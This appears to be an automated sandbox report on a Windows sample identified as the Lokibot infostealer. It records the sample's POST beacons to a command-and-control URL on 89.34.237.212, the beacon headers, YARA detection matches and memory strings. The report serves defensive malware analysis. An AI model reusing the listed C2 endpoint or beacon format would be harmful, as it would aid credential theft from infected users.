Source: global traffic	HTTP traffic detected: POST /annonymous/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 89.34.237.212Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E06B0B08Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /annonymous/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 89.34.237.212Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E06B0B08Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212
Source: unknown	TCP traffic detected without corresponding DNS query: 89.34.237.212

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Code function: 1_2_00404ED4 recv,

1_2_00404ED4

Source: unknown

HTTP traffic detected: POST /annonymous/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 89.34.237.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E06B0B08Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 06:11:56 GMTServer: ApacheContent-Length: 220Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 06:11:57 GMTServer: ApacheContent-Length: 220Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 06:11:57 GMTServer: ApacheContent-Length: 220Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 30 Aug 2024 06:11:58 GMTServer: ApacheContent-Length: 220Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 6e 6e 6f 6e 79 6d 6f 75 73 2f 66 72 65 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /annonymous/fre.phpon this server.</p></body></html>

Source: Mcx2Xk0fqn.exe, 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Mcx2Xk0fqn.exe, 00000001.00000002.1683652068.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://89.34.237.212/annonymous/fre.php
Source: Mcx2Xk0fqn.exe, 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.34.237.212/annonymous/fre.phpzpf
Source: Mcx2Xk0fqn.exe, Mcx2Xk0fqn.exe, 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Mcx2Xk0fqn.exe PID: 7272, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Mcx2Xk0fqn.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00A796B7	0_2_00A796B7
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00A79759	0_2_00A79759
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E70090	0_2_00E70090
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77570	0_2_00E77570
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E71938	0_2_00E71938
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E75FA0	0_2_00E75FA0
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78355	0_2_00E78355
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77730	0_2_00E77730
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78835	0_2_00E78835
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E70006	0_2_00E70006
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78C13	0_2_00E78C13
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E741F0	0_2_00E741F0
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E769F0	0_2_00E769F0
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E761A0	0_2_00E761A0
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77160	0_2_00E77160
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E71D47	0_2_00E71D47
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77157	0_2_00E77157
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78ADB	0_2_00E78ADB
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E7B670	0_2_00E7B670
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77A40	0_2_00E77A40
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E76630	0_2_00E76630
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77A38	0_2_00E77A38
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78A07	0_2_00E78A07
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E74200	0_2_00E74200
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78BC1	0_2_00E78BC1
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E78768	0_2_00E78768
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E77726	0_2_00E77726
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E73728	0_2_00E73728
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 0_2_00E73738	0_2_00E73738
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: 1_2_004029D4	1_2_004029D4

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: String function: 00405B6F appears 42 times

Source: Mcx2Xk0fqn.exe, 00000000.00000002.1654572422.0000000000EB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRunPEDll.dll2 vs Mcx2Xk0fqn.exe
Source: Mcx2Xk0fqn.exe, 00000000.00000002.1654204693.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs Mcx2Xk0fqn.exe
Source: Mcx2Xk0fqn.exe, 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestub.exe4 vs Mcx2Xk0fqn.exe
